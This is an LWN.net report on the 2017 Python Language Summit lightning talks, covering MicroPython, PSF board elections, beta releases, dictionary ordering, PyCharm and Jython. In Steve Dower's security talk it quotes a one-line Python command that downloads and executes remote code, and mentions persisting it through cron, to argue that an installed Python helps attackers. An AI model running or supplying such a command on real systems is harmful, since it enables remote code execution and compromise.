Language summit lightning talks

Did you know...? LWN.net is a subscriber-supported publication; we rely on subscribers to keep the entire operation going. Please help out by buying a subscription and keeping LWN on the net.

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. In fact, it has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said, it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not need to be random, necessarily, though that would be fine, it just needs to change the order enough so that reliance on ordering would be picked up in testing.

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict , an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

python -c "exec(urlopen(...).read())"

cron

Adding it as ajob would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

